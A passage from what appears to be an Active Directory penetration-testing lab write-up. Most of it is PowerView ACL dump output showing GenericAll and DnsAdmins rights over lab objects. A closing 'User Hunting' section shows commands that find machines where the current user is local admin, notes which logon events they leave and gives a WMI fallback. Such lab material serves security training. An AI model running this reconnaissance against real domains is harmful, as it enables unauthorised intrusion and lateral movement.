IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control174User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control175User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control176User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control177User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control178User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group
ObjectDN : CN=Control179User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Control180User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support161User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support162User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support163User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support164User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support165User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support166User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support167User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group
ObjectDN : CN=Support168User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support169User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support170User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support171User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support172User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support173User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support174User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support175User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support176User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support177User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support178User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support179User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=Support180User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1123
IdentityReferenceName : RDPUsers
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : CN=DFSR-LocalSettings,CN=DCORP-DC,OU=Domain
Controllers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : All
AceFlags : None
AceType : AccessAllowedObject
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1000
IdentityReferenceName : DCORP-DC$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-DC,OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=Domain System Volume,CN=DFSR-LocalSettings,CN=DCORP-DC,OU=Domain

Controllers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : All
AceFlags : Inherited
AceType : AccessAllowedObject
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1000
IdentityReferenceName : DCORP-DC$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-DC,OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN : CN=SYSVOL Subscription,CN=Domain System Volume,CN=DFSR-

LocalSettings,CN=DCORP-DC,OU=Domain
Controllers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : All
AceFlags : Inherited
AceType : AccessAllowedObject
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1000
IdentityReferenceName : DCORP-DC$
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DCORP-DC,OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : computer

ObjectDN :
DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree,
ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN :
DC=@,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree,
ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=A.ROOT-
SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,
DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree,
ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=B.ROOT-
SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,
DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree,
ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=C.ROOT-
SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,
DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree,
ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group
ObjectDN : DC=D.ROOT-
SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,
DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree,
ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=E.ROOT-
SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,
DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree,
ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=F.ROOT-
SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,
DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree,
ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=G.ROOT-
SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,
DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree,
ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=H.ROOT-
SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,
DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree,
ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=I.ROOT-
SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,
DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree,
ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=J.ROOT-
SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,
DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree,
ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group
ObjectDN : DC=K.ROOT-
SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,
DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree,
ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=L.ROOT-
SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,
DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree,
ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

ObjectDN : DC=M.ROOT-
SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=dollarcorp,DC=moneycorp,
DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree,
ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : group

User Hunting
Using PowerView
Finding the machines the current user has local administrative privileges
Find-LocalAdminAccess – This function queries the Domain Controller for the list of Computers (Get-
DomainComputer) and then uses multi-threaded Invoke-CheckLocalAdminAccess on each machine. This
function leaves a logon event 4624 and logoff event 4634 in the event viewer of all the machines.
PS C:\Users\student163> Find-LocalAdminAccess -Verbose
VERBOSE: [Find-LocalAdminAccess] Querying computers in the domain
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Invoke-LDAPQuery] filter string: (&(samAccountType=805306369))
VERBOSE: [Get-DomainComputer] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Find-LocalAdminAccess] TargetComputers length: 28
VERBOSE: [Find-LocalAdminAccess] Using threading with threads: 20
VERBOSE: [New-ThreadedFunction] Total number of hosts: 28
VERBOSE: [New-ThreadedFunction] Total number of threads/partitions: 20
VERBOSE: [New-ThreadedFunction] Threads executing
dcorp-adminsrv.dollarcorp.moneycorp.local
VERBOSE: [New-ThreadedFunction] Waiting 100 seconds for final cleanup...
VERBOSE: [New-ThreadedFunction] all threads completed

Find-LocalAdminAccess uses SMB and RPC protocol. If ports used by SMB and RPC are blocked, then we
can use WMI and PowerShell Remoting.

Find-WMILocalAdminAccess.ps1 – This script uses WMI to find of the current user is a local administrator
on the machines in a domain. This function leaves a logon event 4624 and logoff event 4634 in the event
viewer of all the machines. To use this script, we need to create a file which contains all the computers
in the domain. We can obtain all the computers in the domain using Get-DomainComputer.
PS C:\Users\student163> Get-DomainComputer | Select Name

name
----
DCORP-DC
DCORP-ADMINSRV
DCORP-APPSRV
DCORP-CI
DCORP-MGMT
DCORP-MSSQL
DCORP-SQL1
DCORP-STDADMIN
DCORP-STD161
DCORP-STD162
DCORP-STD163
DCORP-STD164
DCORP-STD165
DCORP-STD166
DCORP-STD168
DCORP-STD167
DCORP-STD169
DCORP-STD170
DCORP-STD171
DCORP-STD172
DCORP-STD173
DCORP-STD174
DCORP-STD175
DCORP-STD176
DCORP-STD177
DCORP-STD178
DCORP-STD180
DCORP-STD179

We now create a file with the list of computers and pass it to the script Find-WMILocalAdminAccess.ps1.
PS C:\Users\student163> . C:\Ad\Tools\Find-WMILocalAdminAccess.ps1
PS C:\Users\student163> Find-WMILocalAdminAccess -ComputerFile
"C:\Users\student163\Desktop\shared\Computers.txt"

SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 20348
